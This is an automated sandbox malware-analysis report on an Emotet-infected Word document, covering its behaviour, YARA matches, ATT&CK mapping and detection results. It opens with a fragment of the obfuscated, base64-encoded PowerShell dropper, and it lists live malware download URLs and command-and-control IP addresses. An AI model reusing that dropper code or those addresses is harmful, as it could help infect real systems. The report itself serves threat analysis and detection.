JwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10003D00 cpuid

7_2_10003D00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10029878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	7_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	7_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_100307F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_10030A43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	7_2_10030C6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_10030D3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10029719
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10029878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_100298AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_1002A1D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_100303BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10030661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_100306CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	8_2_10030765
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_100307F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_10030A43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_10030B69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	8_2_10030C6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_10030D3E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1002A210 GetSystemTimeAsFileTime,

7_2_1002A210

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100012B1 GetVersionExA,CreateWindowExA,ShowWindow,UpdateWindow,

7_2_100012B1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2107348022.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2087899639.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2095884659.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2089448478.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2091105299.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2107314831.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2101676455.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2097335111.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2103601856.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2109173183.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2100125404.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2337393859.0000000000301000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2109198053.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2095249206.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2337362227.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2098697585.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2092936438.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2092986854.0000000000251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.150000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information31	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution3	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	System Information Discovery37	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter211	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Security Software Discovery121	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell4	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
info.doc	65%	Virustotal		Browse
info.doc	42%	Metadefender		Browse
info.doc	79%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Xts_nmf\P4188qk\U95D.dll	67%	Metadefender		Browse
C:\Users\user\Xts_nmf\P4188qk\U95D.dll	83%	ReversingLabs	Win32.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.2.rundll32.exe.1b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.250000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.2c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.150000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.180000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.270000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.rundll32.exe.300000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.rundll32.exe.260000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.390000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.300000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.rundll32.exe.690000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://138.197.99.250:8080/ms1mi/fn90mfko2oaz05ju8/jnqglo5fbrsmznurm/tiqz1milsrtd34u5/r0vm4ksa/2tfuy/	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.achutamanasa.com/garmin-pro-fei8o/mW/	100%	Avira URL Cloud	malware
http://www.removepctrojan.com/wp-admin/ak0chH/	100%	Avira URL Cloud	malware
http://johnloveskim.com/a/Tff/	100%	Avira URL Cloud	malware
http://theprajinshee.com/otherfiles/wAFP/	100%	Avira URL Cloud	malware
http://geoffoglemusic.com/wp-admin/7C11oAC/	100%	Avira URL Cloud	malware
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://fmcav.com	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.geosrt.com/aqqhwdap/l0/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://fmcav.com/images/7FV4Nd/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fmcav.com	35.208.84.24	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://138.197.99.250:8080/ms1mi/fn90mfko2oaz05ju8/jnqglo5fbrsmznurm/tiqz1milsrtd34u5/r0vm4ksa/2tfuy/	true	Avira URL Cloud: safe	unknown
http://fmcav.com/images/7FV4Nd/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2093620140.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088789358.00000000024D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090623765.0000000000C77000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2090380702.0000000000A90000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000006.00000002.2092665463.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088415862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090380702.0000000000A90000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2092665463.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088415862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090380702.0000000000A90000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2093620140.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088789358.00000000024D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090623765.0000000000C77000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2086615597.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091080773.0000000002D80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2093148510.0000000002C80000.00000002.00000001.sdmp	false		high
http://wellformedweb.org/CommentAPI/	rundll32.exe, 00000007.00000002.2089458092.00000000026D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091033751.0000000002480000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.achutamanasa.com/garmin-pro-fei8o/mW/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.removepctrojan.com/wp-admin/ak0chH/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://johnloveskim.com/a/Tff/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://theprajinshee.com/otherfiles/wAFP/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://geoffoglemusic.com/wp-admin/7C11oAC/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2092665463.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088415862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090380702.0000000000A90000.00000002.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	rundll32.exe, 00000007.00000002.2089458092.00000000026D0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://computername/printers/printername/.printer	rundll32.exe, 00000007.00000002.2089458092.00000000026D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091033751.0000000002480000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://fmcav.com	powershell.exe, 00000005.00000002.2090833742.0000000003AD6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2086615597.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091080773.0000000002D80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2093148510.0000000002C80000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.geosrt.com/aqqhwdap/l0/	powershell.exe, 00000005.00000002.2090329865.0000000003783000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2093620140.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088789358.00000000024D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090623765.0000000000C77000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2092665463.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088415862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2090380702.0000000000A90000.00000002.00000001.sdmp	false		high
http://treyresearch.net	rundll32.exe, 00000007.00000002.2089458092.00000000026D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091033751.0000000002480000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
152.170.79.100	unknown	Argentina	10318	TelecomArgentinaSAAR	true
190.247.139.101	unknown	Argentina	10318	TelecomArgentinaSAAR	true
35.208.84.24	unknown	United States	19527	GOOGLE-2US	true
138.197.99.250	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337044
Start date:	07.01.2021
Start time:	16:32:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	info.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@36/7@1/4
EGA Information:	Successful, ratio: 91.7%
HDC Information:	Successful, ratio: 56.6% (good quality ratio 55.2%) Quality average: 84.5% Quality standard deviation: 23.5%
HCA Information:	Successful, ratio: 90% Number of executed functions: 208 Number of non-executed functions: 238
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 1628 because it is empty Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:33:36	API Interceptor	1x Sleep call for process: msg.exe modified
16:33:37	API Interceptor	29x Sleep call for process: powershell.exe modified
16:33:40	API Interceptor	572x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
152.170.79.100	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100/jne6snt/m6myiohmse/
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100/gsyuaw2no20y/
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100/2w9radk/e1bqg93t32/bfbkkxnxm/kzpgfx0srz2azra2z6/wtvvr/zuhrx/
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100/udiwy/9lqzybri7w/n3qkg5seewustvns68/l36c10de4srgz133y/
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100/f5hvsm8p45k9/r0hin/g4fm3hzyqd5c/
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100/x6g2gr/bchg5i/1dw1veojm5/wx1zsm5gbt71xbtih/gqcr5rzmurhr33/
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100/g66ezlsi59l2qh9tcn/ydgp2y3srh2m5hj6/xkq9/wstqsdd/xpmc9zuidrre/
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100/8wjtai/6101dxx/4ggv7sw145lrki/
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100/7gfh58w8tuftcw/
